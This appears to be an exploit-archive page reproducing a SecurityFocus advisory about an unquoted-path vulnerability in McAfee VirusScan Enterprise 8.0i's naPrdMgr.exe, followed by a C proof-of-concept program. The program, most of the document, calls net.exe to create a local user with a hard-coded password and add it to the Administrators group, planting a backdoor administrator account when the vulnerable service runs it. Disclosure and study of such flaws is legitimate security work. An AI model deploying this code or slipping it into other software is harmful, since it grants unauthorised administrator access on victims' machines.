36 lines
No EOL
1.1 KiB
C
36 lines
No EOL
1.1 KiB
C
source: http://www.securityfocus.com/bid/16040/info
|
|
|
|
McAfee VirusScan is prone to a vulnerability that could allow an arbitrary file to be executed.
|
|
|
|
The 'naPrdMgr.exe' process calls applications without using properly quoted paths. Successful exploitation may allow local attackers to gain elevated privileges.
|
|
|
|
McAfee VirusScan Enterprise 8.0i (patch 11) is reportedly vulnerable. Other versions may be affected as well.
|
|
|
|
// ===== Start Program.c ======
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
|
|
INT main( VOID )
|
|
{
|
|
CHAR szWinDir[ _MAX_PATH ];
|
|
CHAR szCmdLine[ _MAX_PATH ];
|
|
|
|
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
|
|
|
|
printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );
|
|
|
|
wsprintf( szCmdLine, "%s\\system32\\net.exe user Program
|
|
Pr0gr@m$$ /add", szWinDir );
|
|
|
|
system( szCmdLine );
|
|
|
|
printf( "Adding user \"Program\" to the local Administrators group...\n" );
|
|
|
|
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
|
|
Administrators Program /add", szWinDir );
|
|
|
|
system( szCmdLine );
|
|
|
|
return 0;
|
|
}
|
|
// ===== End Program.c ======
|